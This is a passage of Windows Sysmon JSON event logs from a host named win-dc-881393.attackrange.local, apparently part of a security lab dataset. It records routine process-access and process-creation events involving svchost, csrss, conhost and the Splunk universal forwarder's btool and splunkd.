05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3363,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3364,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3365,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-0010623B0500}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-0010623B0500}","TargetProcessId":"4528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3366,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.070\r\nProcessGuid: {A837DB8D-023B-5F25-0000-00101A3C0500}\r\nProcessId: 4440\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-023B-5F25-0000-0010623B0500}\r\nParentProcessId: 4528\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.070","ProcessGuid":"{A837DB8D-023B-5F25-0000-00101A3C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-023B-5F25-0000-0010623B0500}","ParentProcessId":"4528","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3367,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-023B-5F25-0000-0010623B0500}\r\nSourceProcessId: 4528\r\nSourceThreadId: 4548\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-00101A3C0500}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-023B-5F25-0000-0010623B0500}","SourceProcessId":"4528","SourceThreadId":"4548","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-00101A3C0500}","TargetProcessId":"4440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3368,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-00101A3C0500}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-00101A3C0500}","TargetProcessId":"4440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3369,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3370,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3371,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 